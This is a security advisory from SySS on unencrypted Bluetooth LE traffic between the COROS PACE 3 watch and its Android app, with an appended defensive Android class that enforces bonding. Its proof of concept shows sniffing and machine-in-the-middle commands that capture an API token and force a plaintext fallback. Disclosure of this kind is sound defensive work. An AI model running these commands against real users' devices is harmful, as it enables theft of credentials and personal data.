-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2025-025
Product: COROS PACE 3 / COROS Android application
Manufacturer: COROS Wearables, Inc.
Affected Version(s): <= V 3.8.12
Tested Version(s): V 3.8.12
Vulnerability Type: Cleartext Transmission of Sensitive Information (CWE-319)
Risk Level: High
Solution Status: Not yet fixed
Manufacturer Notification: 2025-03-14
Solution Date: N.A.
Public Disclosure: 2025-06-17
CVE Reference: CVE-2025-32875
Author of Advisory: Moritz Abrell, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The COROS PACE 3 is a professional GPS sport smart watch.

The manufacturer describes the product as follows (see [1]):

"Improving on its legendary predecessor in every way, PACE 3 packs an
even more powerful punch. Track your training and recovery with a watch
that's lightweight and comfortable, with advanced technology,
outstanding data accuracy, and backed by the industry-leading COROS
training software system. The COROS PACE 3 paves the way to discover
your potential."

Due to the lack of Bluetooth pairing and bonding in the COROS Android
application [4], an attacker within Bluetooth range can eavesdrop on,
extract, and in active setups manipulate sensitive data transmitted over
Bluetooth Low Energy (BLE).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

When using the COROS Android application, Bluetooth pairing and bonding
are neither initiated nor enforced by the application itself. Also, the
watch does not enforce pairing and bonding. As a result, any data
transmitted via BLE remains unencrypted, allowing attackers within
Bluetooth range to eavesdrop on the communication.

Furthermore, even if a user manually initiates pairing and bonding in
the Android settings, the application continues to transmit data without
requiring the watch to be bonded.
This fallback behavior enables attackers to exploit the communication,
for example, by conducting an active machine-in-the-middle attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

By using tools and frameworks such as MIRAGE [5], WHAD [6] or
Sniffle [7], the BLE communication can be sniffed. The following example
shows the captured API access token, transmitted by the app to the
COROS PACE 3 in plaintext:

$ wsniff -i uart0 -o sniffed-ble.pcap --format=hexdump --follow-connection
[...]
<<< Data PDU
00000000: 02 5C 58 00 04 00 52 19 00 B2 00 02 00 20 41 57  .\X...R...... AW
00000010: 39 52 4E [redacted]                              9RN [redacted]
00000020: 46 54 50 46 4E 34 37 52 47 4B 37 58 4B 4A 05 65  FTPFN47RGK7XKJ.e
00000030: 6E 2D 55 53 00 27 30 3D 63 6F 72 6F 73 2E 63 6F  n-US.'0=coros.co
00000040: 6D 26 31 3D 61 70 69 65 75 26 32 3D 65 70 6F 65  m&1=apieu&2=epoe
00000050: 75 26 33 3D 6D 61 70 73 74 61 74 69 63 B2        u&3=mapstatic.
[...]

Even if the COROS PACE 3 is bonded in the Android settings, the
communication can be forced to fall back to plaintext in an active
machine-in-the-middle setup:

$ mirage ble_mitm TARGET=F7:AF:1D:27:03:b0
[INFO] Module ble_mitm loaded !
[SUCCESS] HCI Device (hci0) successfully instanciated !
[SUCCESS] HCI Device (hci1) successfully instanciated !
[INFO] Entering SCAN stage ...
[SUCCESS] Found corresponding advertisement !
[INFO] Entering CLONE stage ...
[INFO] Connecting to slave F7:AF:1D:27:03:B0...
[INFO] Updating connection handle : 2048
[SUCCESS] Connected on slave : F7:AF:1D:27:03:B0
[INFO] Entering WAIT_CONNECTION stage ...
[INFO] Updating connection handle : 68
[SUCCESS] Master connected : 7B:60:71:9A:2C:4B
[INFO] Slave disconnected !
[INFO] Changing HCI Device (hci0) Random Address to : 7B:60:71:9A:2C:4B
[SUCCESS] BD Address successfully modified !
[INFO] Connecting to slave F7:AF:1D:27:03:B0...
[INFO] Updating connection handle : 2048
[INFO] Entering ACTIVE_MITM stage ...
[INFO] Read By Group Type Request (from master) : startHandle = 0x1 / endHandle = 0xffff / uuid = 0x2800
[INFO] Redirecting to slave ...
[INFO] Long Term Key Request (from master) : ediv = 0x1688 / rand = e9d6735c39cead61
[INFO] No LTK provided, encryption not enabled.
[INFO] Read By Group Type Response (from slave) : length = 6 / data = 01000500001806000600011807000a000f18
[...]

Afterwards, the Android app keeps communicating via BLE in plaintext.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Not yet fixed

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-03-10: Vulnerability discovered
2025-03-14: Vulnerability reported to manufacturer
2025-03-14: Confirmation of receipt received
2025-03-17: Asked the manufacturer for an update
2025-03-31: More information provided to the manufacturer
2025-04-07: Asked the manufacturer for an update
2025-04-14: Informed the manufacturer about the assigned CVE-ID and asked
            for an update once again
2025-04-15: Answer received from the manufacturer; manufacturer informed
            SySS GmbH that a fix for the vulnerability is planned for the
            end of the year (2025)
2025-04-15: Receipt confirmed, and the issue was clarified once more,
            along with a recommendation for prompt resolution
2025-06-17: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] COROS PACE 3 product website
    https://eu.coros.com/pace3
[2] SySS Security Advisory SYSS-2025-025
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-025.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] COROS Android application
    https://play.google.com/store/apps/details?id=com.yf.smart.coros.dist
[5] MIRAGE GitHub repository:
    https://github.com/RCayre/mirage
[6] WHAD GitHub repository:
    https://github.com/whad-team/whad-client
[7] Sniffle GitHub repository:
    https://github.com/nccgroup/Sniffle
[8] CVE-2025-32875
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32875
[9] Detailed blog post:
    https://blog.syss.com/posts/bluetooth-analysis-coros-pace-3/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail: moritz.abrell@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc
Key Fingerprint: 2927 7EB6 1A20 0679 79E9 87E6 AE0C 9BF8 F134 8B53

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS
website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmhQEc0ACgkQrgyb+PE0
i1N97hAAhImrzph0e1Ub93qOjvxnAAMBW/yjvDqBRUpdR/uBWPIhTtbV3B9ZIfDR
irwXaRWpr8eLXXniC5d9uZeX6dyqCMQpyZJ7hpugu+NpjI8o+I2cJLvRItaDpufj
RfDvrUEW8Or3sSkID2reWGci/WAlud7YIFD8vaHBbcptJP5uUN7RHbk5TM7AM/Dc
8GQKeB2+aonzWcdUkfv8SCAXYwUmBueDOBNvFyUwuCm8p1Dea5b4aUmOnLKKW/HD
g9yCY7MpENiGM3ToiIJ+2lJFGrcpgiY1YCtb4o8KU45CLkteU31PHDcKkZUg4vdG
vKpueMbaiqI/0LEUdAoYJFaYbGeRoe1zbEE8Oy2J6Sx2kvgZKWxgruCGtkN+fKe0
zYSuk5CnBc1ssBpsLgJ3Lw42cuwFWyjnDFCrP7Sq0XSpNyaA4gIEWYCMw92//rk1
XIeJFRCG1AXEuwavn8eJMu3qQR23LmIbMicmXro/Kb2GuHG200g8o+6394O25+JP
L6tcGGKZXlY1anrAFUQX5Ol8XcY3EOCKSxY1e/61WmiwS+fefVMJky+yvOhJYAMs
ezvmTObgOjZn7aYkmjfqGtGjGhmovYOEYxvMVBDFaStvVQ3g1i6CMP2/IQ9ds7AK
mvmdXtH7nCXhfyNm4BiIYRFkcYVq1lyu2V0vcCxfSLq2jZI0E2c=
=AE0i
-----END PGP SIGNATURE-----
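Editor's addition, placed after the signed advisory text so that it is clearly not part of the SySS publication and not code from the COROS application: the "Vulnerability Details" section names two app-side defects, that the app never initiates or requires bonding, and that it keeps transmitting when the link is not bonded. The Android class below shows what the opposite behaviour looks like for a BLE central. The class name, the API-level assumption (API 33+, for the three-argument writeCharacteristic) and the assumption that BLUETOOTH_CONNECT has already been granted are mine; none of them come from the advisory.

```java
// Added example (not from the SySS advisory or the COROS application): an
// Android BLE central that refuses to send application data until the peer
// is bonded, and that treats an unencrypted link as a hard failure instead
// of silently falling back to plaintext.
// Assumptions: API level 33+ and the BLUETOOTH_CONNECT permission granted.
import android.bluetooth.BluetoothDevice;
import android.bluetooth.BluetoothGatt;
import android.bluetooth.BluetoothGattCallback;
import android.bluetooth.BluetoothGattCharacteristic;
import android.bluetooth.BluetoothStatusCodes;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.util.Log;

public final class BondEnforcingGattClient extends BluetoothGattCallback {
    private static final String TAG = "BondEnforcingGatt";

    private final Context context;
    private final BluetoothDevice device;
    private BluetoothGatt gatt;   // set by connect()

    public BondEnforcingGattClient(Context context, BluetoothDevice device) {
        this.context = context;
        this.device = device;
    }

    public void connect() {
        gatt = device.connectGatt(context, false, this);
    }

    /** True only if a bond (and therefore a stored LTK) exists for this peer. */
    public boolean isBonded() {
        return device.getBondState() == BluetoothDevice.BOND_BONDED;
    }

    /**
     * Runs onBonded only once the peer is bonded. If no bond exists, pairing
     * is started by the app itself instead of being left to the user and the
     * Android settings, which is the first defect the advisory describes.
     */
    public void ensureBondedThen(Runnable onBonded) {
        if (isBonded()) {
            onBonded.run();
            return;
        }
        BroadcastReceiver bondWatcher = new BroadcastReceiver() {
            @Override
            public void onReceive(Context ctx, Intent intent) {
                BluetoothDevice peer = intent.getParcelableExtra(BluetoothDevice.EXTRA_DEVICE);
                if (peer == null || !device.getAddress().equals(peer.getAddress())) {
                    return;   // bond event for some other device
                }
                int state = intent.getIntExtra(BluetoothDevice.EXTRA_BOND_STATE,
                                               BluetoothDevice.BOND_NONE);
                if (state == BluetoothDevice.BOND_BONDED) {
                    ctx.unregisterReceiver(this);
                    onBonded.run();
                } else if (state == BluetoothDevice.BOND_NONE) {
                    ctx.unregisterReceiver(this);
                    Log.w(TAG, "Bonding failed or was rejected; no data will be sent");
                }
                // BOND_BONDING: pairing still in progress, keep waiting.
            }
        };
        context.registerReceiver(bondWatcher,
                new IntentFilter(BluetoothDevice.ACTION_BOND_STATE_CHANGED));
        if (device.getBondState() == BluetoothDevice.BOND_NONE && !device.createBond()) {
            context.unregisterReceiver(bondWatcher);
            Log.e(TAG, "createBond() could not be started; no data will be sent");
        }
    }

    /** Guarded write: a secret such as an API token is dropped, not sent unbonded. */
    public boolean writeIfBonded(BluetoothGattCharacteristic characteristic, byte[] value) {
        if (gatt == null || !isBonded()) {
            Log.w(TAG, "Peer not bonded; refusing to send sensitive data in cleartext");
            return false;
        }
        int status = gatt.writeCharacteristic(characteristic, value,
                BluetoothGattCharacteristic.WRITE_TYPE_DEFAULT);
        return status == BluetoothStatusCodes.SUCCESS;
    }

    /**
     * A bond does not prove the current link is encrypted. These ATT statuses
     * are only returned by a peripheral that requires encryption on its
     * characteristics; when they appear, disconnect rather than retry without
     * protection.
     */
    @Override
    public void onCharacteristicWrite(BluetoothGatt g, BluetoothGattCharacteristic c, int status) {
        if (status == BluetoothGatt.GATT_INSUFFICIENT_ENCRYPTION
                || status == BluetoothGatt.GATT_INSUFFICIENT_AUTHENTICATION) {
            Log.e(TAG, "Link not encrypted/authenticated; disconnecting instead of downgrading");
            g.disconnect();
        }
    }
}
```

Two caveats follow from the advisory's own PoC. First, `getBondState()` reports a stored bond, not the encryption state of the live connection, so the bond check alone addresses the first finding (no pairing ever requested) but not the second (a bonded device continuing in plaintext after the mirage run logs "No LTK provided, encryption not enabled."). Second, the ATT "insufficient encryption/authentication" responses that the callback reacts to are only generated by a peripheral that marks its characteristics as encryption-required; the advisory states that the watch does not enforce pairing and bonding, so that half of the fix sits in the watch firmware and can only come from the manufacturer.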